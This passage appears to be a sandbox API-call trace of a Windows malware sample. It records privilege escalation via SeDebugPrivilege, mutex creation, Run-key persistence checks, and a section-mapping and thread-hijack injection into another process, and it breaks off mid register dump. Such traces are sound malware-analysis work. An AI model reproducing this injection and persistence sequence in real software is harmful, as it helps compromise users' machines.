0x0 [0270.172] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x436f50) returned 1 [0270.172] NtQueryInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x25ec74, FileInformation=0x25e9e8, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x25ec74, FileInformation=0x25e9e8) returned 0x0 [0270.172] NtClose (Handle=0xb0) returned 0x0 [0270.172] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x208) returned 0x436f50 [0270.172] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x436f50) returned 1 [0270.175] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x73f31320, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x25eca8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x25eca8*(BaseAddress=0x73f31000, AllocationBase=0x73f30000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0270.506] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x25ed00, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x25ed00, ResultLength=0x0) returned 0x0 [0270.510] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x25ed24, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x25ed24, ReturnLength=0x0) returned 0x0 [0270.532] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x1f20020) returned 1 [0270.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25e9b4*=0x0, ZeroBits=0x0, RegionSize=0x25e9b8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x25e9b4*=0x120000, RegionSize=0x25e9b8*=0x10000) returned 0x0 [0270.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x120000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x120000, ResultLength=0x0) returned 0x0 [0270.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x25ed14*=0x120000, RegionSize=0x25ed18, FreeType=0x8000) returned 0x0 [0270.577] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x25ead0 | out: Value="kEecfMwgj") returned 0x0 [0270.603] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x25ed2c | out: TokenHandle=0x25ed2c*=0xb0) returned 0x0 [0270.607] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x25ed20 | out: lpLuid=0x25ed20*(LowPart=0x14, HighPart=0)) returned 1 [0270.618] NtAdjustPrivilegesToken (in: TokenHandle=0xb0, DisableAllPrivileges=0, NewState=0x25ed1c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0270.621] NtClose (Handle=0xb0) returned 0x0 [0270.622] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x25e660 | out: Value="kEecfMwgj") returned 0x0 [0270.622] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="62AQ09U8", Value=0x25eb0c | out: Value=0x25eb0c) returned 0xc0000100 [0270.622] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x25e440 | out: Value="kEecfMwgj") returned 0x0 [0270.649] NtOpenDirectoryObject (in: FileHandle=0x25e900, DesiredAccess=0x2000f, ObjectAttributes=0x25e8cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x25e900*=0xb0) returned 0x0 [0270.651] NtCreateMutant (in: MutantHandle=0x25eb2c, DesiredAccess=0x1f0001, ObjectAttributes=0x25e8b4*(Length=0x18, RootDirectory=0xb0, ObjectName="62AQ09U8C34JCCAZ", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x25eb2c*=0xf4) returned 0x0 [0270.651] NtClose (Handle=0xb0) returned 0x0 [0270.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x43b480 [0270.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x43c488 [0270.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x43d490 [0270.680] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x25e76c | out: Value="C:\\Program Files (x86)") returned 0x0 [0270.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x25eae4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.690] NtCreateFile (in: FileHandle=0x25eb04, DesiredAccess=0x120089, ObjectAttributes=0x25eacc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x25eaec, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x25eb04*=0xb0, IoStatusBlock=0x25eaec*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0270.692] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43e498) returned 1 [0270.696] NtQueryInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x25eaec, FileInformation=0x25ea44, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x25eaec, FileInformation=0x25ea44) returned 0x0 [0270.696] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x100400) returned 0x690020 [0270.714] NtReadFile (in: FileHandle=0xb0, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x25eaec, Buffer=0x690020, BufferLength=0x100000, ByteOffset=0x25ea5c*=0, Key=0x0 | out: IoStatusBlock=0x25eaec, Buffer=0x690020*) returned 0x0 [0270.729] NtClose (Handle=0xb0) returned 0x0 [0270.730] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x25ead4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.730] NtCreateFile (in: FileHandle=0x25eaf4, DesiredAccess=0x120089, ObjectAttributes=0x25eabc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x25eadc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x25eaf4*=0xb0, IoStatusBlock=0x25eadc*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0270.730] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43e498) returned 1 [0270.730] NtQueryInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x25eadc, FileInformation=0x25ea34, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x25eadc, FileInformation=0x25ea34) returned 0x0 [0270.730] NtClose (Handle=0xb0) returned 0x0 [0270.730] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x25eb04, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.730] NtCreateFile (in: FileHandle=0x25eb24, DesiredAccess=0x120089, ObjectAttributes=0x25eaec*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x25eb0c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x25eb24*=0xb0, IoStatusBlock=0x25eb0c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0270.731] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43e498) returned 1 [0270.734] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x25e704 | out: TokenHandle=0x25e704*=0xf8) returned 0x0 [0270.737] NtQueryInformationToken (in: TokenHandle=0xf8, TokenInformationClass=0x1, TokenInformation=0x25defc, TokenInformationLength=0x400, ReturnLength=0x25e6fc | out: TokenInformation=0x25defc, ReturnLength=0x25e6fc) returned 0x0 [0270.738] ConvertSidToStringSidW (in: Sid=0x25df04*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x25e700 | out: StringSid=0x25e700*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0270.738] NtClose (Handle=0xf8) returned 0x0 [0270.740] NtCreateKey (in: KeyHandle=0x25eb3c, DesiredAccess=0x20219, ObjectAttributes=0x25e090*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x25eb3c*=0xf8) returned 0x0 [0270.742] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x25e2e4, Length=0x200, ResultLength=0x25e6e4 | out: KeyValueInformation=0x25e2e4, ResultLength=0x25e6e4) returned 0x0 [0270.742] NtClose (Handle=0xf8) returned 0x0 [0270.751] SetErrorMode (uMode=0x8003) returned 0x1 [0270.754] NtCreateSection (in: SectionHandle=0x25e74c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x25e4cc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x25e74c*=0xf8) returned 0x0 [0270.758] NtMapViewOfSection (in: SectionHandle=0xf8, ProcessHandle=0xffffffff, BaseAddress=0x25e750*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x25e4cc*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x25e750*=0x120000, SectionOffset=0x0, ViewSize=0x25e4cc*=0x29000) returned 0x0 [0270.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25e4c4*=0x0, ZeroBits=0x0, RegionSize=0x25e4c8*=0x28c00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x25e4c4*=0x1d0000, RegionSize=0x25e4c8*=0x29000) returned 0x0 [0270.765] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x43e498 [0270.765] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x25e208 | out: TokenHandle=0x25e208*=0xfc) returned 0x0 [0270.765] NtQueryInformationToken (in: TokenHandle=0xfc, TokenInformationClass=0x1, TokenInformation=0x25da00, TokenInformationLength=0x400, ReturnLength=0x25e200 | out: TokenInformation=0x25da00, ReturnLength=0x25e200) returned 0x0 [0270.765] ConvertSidToStringSidW (in: Sid=0x25da08*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x25e204 | out: StringSid=0x25e204*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0270.765] NtClose (Handle=0xfc) returned 0x0 [0270.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25e478*=0x0, ZeroBits=0x0, RegionSize=0x25e47c*=0x8f646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x25e478*=0x260000, RegionSize=0x25e47c*=0x90000) returned 0x0 [0270.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25e464*=0x0, ZeroBits=0x0, RegionSize=0x25e468*=0x8f646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x25e464*=0x380000, RegionSize=0x25e468*=0x90000) returned 0x0 [0270.778] RtlFreeHeap (HeapHandle=0x420000, Flags=0x0, BaseAddress=0x43e498) returned 1 [0270.778] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1000) returned 0x43e498 [0270.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25e4e4*=0x0, ZeroBits=0x0, RegionSize=0x25e4e8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x25e4e4*=0x200000, RegionSize=0x25e4e8*=0x10000) returned 0x0 [0270.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x200000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x200000, ResultLength=0x0) returned 0x0 [0270.780] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x25db90 | out: Value="kEecfMwgj") returned 0x0 [0270.780] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x25defc | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0270.780] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x25deec | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0270.780] NtCreateSection (in: SectionHandle=0x25f53c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x25df14, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x25f53c*=0xfc) returned 0x0 [0270.781] NtMapViewOfSection (in: SectionHandle=0xfc, ProcessHandle=0xffffffff, BaseAddress=0x25f538*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x25df14*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x25f538*=0x23c0000, SectionOffset=0x0, ViewSize=0x25df14*=0x1b58000) returned 0x0 [0270.782] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x43f4a0 [0270.872] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x25d6ac | out: TokenHandle=0x25d6ac*=0x100) returned 0x0 [0270.872] NtQueryInformationToken (in: TokenHandle=0x100, TokenInformationClass=0x1, TokenInformation=0x25cea4, TokenInformationLength=0x400, ReturnLength=0x25d6a4 | out: TokenInformation=0x25cea4, ReturnLength=0x25d6a4) returned 0x0 [0270.872] ConvertSidToStringSidW (in: Sid=0x25ceac*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x25d6a8 | out: StringSid=0x25d6a8*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0270.872] NtClose (Handle=0x100) returned 0x0 [0270.880] RtlIntegerToChar (in: Value=0x25ba05, Base=0x10, Length=0x20, String=0x23ca4a9 | out: String="25BA05") returned 0x0 [0270.881] NtCreateKey (in: KeyHandle=0x25e120, DesiredAccess=0x20219, ObjectAttributes=0x25d6ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x25e120*=0x100) returned 0x0 [0270.885] NtQueryValueKey (in: KeyHandle=0x100, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0x25dcf8, Length=0x100, ResultLength=0x25e174 | out: KeyValueInformation=0x25dcf8*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x2e, NameLength=0x16, Name="ProductName", Data="Windows 7 Professional"), ResultLength=0x25e174) returned 0x0 [0270.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25d6dc*=0x0, ZeroBits=0x0, RegionSize=0x25d6e0*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x25d6dc*=0x3f20000, RegionSize=0x25d6e0*=0x1f5000) returned 0x0 [0270.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25d6c8*=0x0, ZeroBits=0x0, RegionSize=0x25d6cc*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x25d6c8*=0x4120000, RegionSize=0x25d6cc*=0x1f5000) returned 0x0 [0270.885] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x25d6cc | out: Value="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0 [0270.885] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x25d694 | out: Value="C:\\Program Files (x86)") returned 0x0 [0271.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d599, lpParameter=0x25ed60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0271.256] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4000) returned 0x4434a8 [0271.256] NtOpenDirectoryObject (in: FileHandle=0x25df0c, DesiredAccess=0x2000f, ObjectAttributes=0x25ded8*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x25df0c*=0x108) returned 0x0 [0271.256] NtCreateMutant (in: MutantHandle=0x25e190, DesiredAccess=0x1f0001, ObjectAttributes=0x25dec0*(Length=0x18, RootDirectory=0x108, ObjectName="-099ODE3WG-67X0J", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x25e190*=0x10c) returned 0x0 [0271.256] NtClose (Handle=0x108) returned 0x0 [0271.260] NtOpenProcess (in: ProcessHandle=0x25e4f4, DesiredAccess=0x438, ObjectAttributes=0x25e4bc*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x25e4d4*(UniqueProcess=0x454, UniqueThread=0x0) | out: ProcessHandle=0x25e4f4*=0x108) returned 0x0 [0271.260] NtQueryInformationProcess (in: ProcessHandle=0x108, ProcessInformationClass=0x1a, ProcessInformation=0x25e4e4, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x25e4e4, ReturnLength=0x0) returned 0x0 [0271.260] NtMapViewOfSection (in: SectionHandle=0xfc, ProcessHandle=0x108, BaseAddress=0x25e4e0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x25e4dc*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x25e4e0*=0x9310000, SectionOffset=0x0, ViewSize=0x25e4dc*=0x1b58000) returned 0x0 [0271.261] NtClose (Handle=0x108) returned 0x0 [0271.264] NtDelayExecution (Alertable=0, Interval=0x25e13c*=-50000000) returned 0x0 [0276.286] NtOpenProcess (in: ProcessHandle=0x25e0f8, DesiredAccess=0x438, ObjectAttributes=0x25d6a8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x25d6e8*(UniqueProcess=0x454, UniqueThread=0x0) | out: ProcessHandle=0x25e0f8*=0x114) returned 0x0 [0276.289] NtQueryInformationProcess (in: ProcessHandle=0x114, ProcessInformationClass=0x0, ProcessInformation=0x25d6f8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x25d6f8, ReturnLength=0x0) returned 0x0 [0276.298] NtOpenThread (in: ThreadHandle=0x25d6a0, DesiredAccess=0x1a, ObjectAttributes=0x25d6a8, ClientId=0x25d6d8*(UniqueProcess=0x0, UniqueThread=0x458) | out: ThreadHandle=0x25d6a0*=0x110) returned 0x0 [0276.303] NtSuspendThread (in: ThreadHandle=0x110, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0276.310] NtGetContextThread (in: ThreadHandle=0x110, Context=0x25dbf0 | out: Context=0x25dbf0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x46, [73]=0xf6, [74]=0x61, [75]=0x7, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x28f1f0, SegGs=0x0, SegFs=0x2514900, SegEs=0x0, SegDs=0x28f588, Edi=0x0, Esi=0x100ec, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x28f418, SegCs=0x0, EFlags=0x28f3f0, Esp=0x0, SegSs=0x16, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x80, [5]=0xf4, [6]=0x28, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x3a, [45]=0x93, [46]=0x42, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, 